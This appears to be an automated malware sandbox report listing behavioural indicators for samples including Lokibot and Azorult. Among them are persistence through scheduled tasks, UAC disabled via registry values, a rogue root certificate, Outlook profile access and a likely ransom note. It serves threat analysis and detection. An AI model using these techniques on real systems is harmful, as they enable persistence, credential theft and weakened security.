Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | aurera_dx-1716192337.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | winit.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winit.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe

Creates scheduled task(s) (1 TTP, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe
pid | process
4132 | schtasks.exe
2968 | schtasks.exe
3076 | schtasks.exe
1048 | schtasks.exe

Delays execution with timeout.exe (7 IoCs)
Processes: timeout.exe
pid | process
2940 | timeout.exe
1396 | timeout.exe
1264 | timeout.exe
6592 | timeout.exe
2016 | timeout.exe
444 | timeout.exe
5632 | timeout.exe

Enumerates system info in registry (2 TTPs, 12 IoCs)
Processes: WINWORD.EXE, chrome.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE

Gathers network information (2 TTPs, 1 IoC)
Uses commandline utility to view network configuration.
Processes: ipconfig.exe
pid | process
6792 | ipconfig.exe

Kills process with taskkill (5 IoCs)
Processes: taskkill.exe
pid | process
2100 | taskkill.exe
3472 | taskkill.exe
2816 | taskkill.exe
5280 | taskkill.exe
6576 | taskkill.exe
Processes:
- AcroRd32.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
- AcroRd32.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
- chrome.exe: Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry
- chrome.exe: Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133606658440816498"
-
Modifies registry class 64 IoCs
Processes:
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = ffffffff
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\md_auto_file\shell\Read
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"
- aurera+OTC+install.tmp: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe
- aurera+OTC+install.tmp: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Applications
- OpenWith.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\.json\ = "json_auto_file"
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "14"
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"
- aurera+OTC+install.tmp: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Aurera Global OT\\aurera_dx.exe,0"
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\json_auto_file
- MsiExec.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"
- MsiExec.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\SniffedFolderType = "Documents"
- winit.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset
- OpenWith.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\json_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\""
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 6c003100000000009a584f6610004f4e454e4f547e310000540009000400efbe9a584f669a5853662e000000902902000000010000000000000000000000000000000691bd004f006e0065004e006f007400650020004e006f007400650062006f006f006b007300000018000000
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- winit.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\MIME\Database
- aurera+OTC+install.tmp: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\.exe\OpenWithProgids\AureraGlobalOT.exe
- aurera+OTC+install.tmp: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\DefaultIcon
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
- aurera+OTC+install.tmp: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\Aurera Global OT\\aurera_dx.exe\" \"%1\""
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "13"
- wini.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- aurera+OTC+install.tmp: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\.exe\OpenWithProgids
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
- MsiExec.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"
- MsiExec.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"
- aurera+OTC+install.tmp: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\ = "Aurera Global OT"
- aurera+OTC+install.tmp: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\shell
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
- aurera+OTC+install.tmp: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Applications\aurera_dx.exe\SupportedTypes\.myp
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\json_auto_file\shell\Read
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000
- R8.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- OpenWith.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings
- MsiExec.exe: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "12"
- OpenWith.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\md_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\""
- MsiExec.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000
- MsiExec.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"
- aurera+OTC+install.tmp: Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\AureraGlobalOT.exe\shell\open\command
-
Processes:
- lyrebird.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
- lyrebird.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted)
- lyrebird.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted)
-
NTFS ADS 2 IoCs
Processes:
- taskhostw.exe: File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2
- WINWORD.EXE: File opened for modification C:\Users\Admin\AppData\Local\Temp\{0251A466-4239-44FB-B7CF-A66D67D4A45B}\8tr.exe:Zone.Identifier
-
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
- 5400 NOTEPAD.EXE
- 1720 NOTEPAD.EXE
-
Runs .reg file with regedit 2 IoCs
Processes:
- 4424 regedit.exe
- 4216 regedit.exe
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 5 IoCs
Processes:
- 1804 WINWORD.EXE (2 entries)
- 756 WINWORD.EXE (2 entries)
- 3876 WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- 2736 chrome.exe (2 entries)
- 1768 aurera+OTC+install.tmp (2 entries)
- 4092 chrome.exe (2 entries)
- 5500 lyrebird.exe (2 entries)
- 4628 AcroRd32.exe (20 entries)
- 2396 mspaint.exe (2 entries)
- 2124 AcroRd32.exe (20 entries)
- 5884 Lokibot.exe (4 entries)
- 1580 Azorult.exe (10 entries)
-
Suspicious behavior: GetForegroundWindowSpam 8 IoCs
Processes:
- 5428 OpenWith.exe
- 5256 OpenWith.exe
- 5352 OpenWith.exe
- 3064 OpenWith.exe
- 5596 MsiExec.exe
- 5124 taskhostw.exe
- 2736 chrome.exe
- 2264 taskmgr.exe
-
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
- 664 (process name blank in the report; 3 entries)
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs
Processes:
- 2736 chrome.exe (30 entries)
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
- 3980 rfusclient.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- 2736 chrome.exe: Token: SeShutdownPrivilege (32 entries)
- 2736 chrome.exe: Token: SeCreatePagefilePrivilege (32 entries)
The two privileges are recorded alternately, 64 entries in total.
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
- 2736 chrome.exe (55 entries)
- 1768 aurera+OTC+install.tmp
- 2736 chrome.exe (8 entries)
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
- 2736 chrome.exe (32 entries)
- 1392 firefox.exe (12 entries)
- 2736 chrome.exe (8 entries)
- 4688 firefox.exe (12 entries)
-
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
- 1804 WINWORD.EXE (8 entries)
- 2812 aurera_dx.exe
- 4380 aurera_dx-1716192337.exe
- 1392 firefox.exe (13 entries)
- 4688 firefox.exe
- 4132 OpenWith.exe
- 5428 OpenWith.exe (39 entries)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
- PID 2736 (chrome.exe) wrote to memory of 4576 (chrome.exe), 2 entries
- PID 2736 (chrome.exe) wrote to memory of 1236 (chrome.exe), 30 entries
- PID 2736 (chrome.exe) wrote to memory of 4388 (chrome.exe), 2 entries
- PID 2736 (chrome.exe) wrote to memory of 3636 (chrome.exe), 30 entries
-
System policy modification 1 TTPs 3 IoCs
Processes:
- Azorult.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- Azorult.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- Azorult.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
- 4588 attrib.exe
- 6856 attrib.exe
- 6872 attrib.exe
- 6888 attrib.exe
- 1820 attrib.exe
- 4884 attrib.exe
-
outlook_office_path 1 IoCs
Processes:
- Lokibot.exe: Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
-
outlook_win_path 1 IoCs
Processes:
- Lokibot.exe: Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (level 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Boendet.docx" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1804
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 1)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:4576)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb07a2ab58,0x7ffb07a2ab68,0x7ffb07a2ab78
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:1236)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:2
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:4388)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:3636)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:4108)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:2040)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:3704)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:1180)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:556)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4380 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:1864)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:2600)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:2720)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe (level 2, PID:228)
Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5044 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2856
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4960 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2528
-
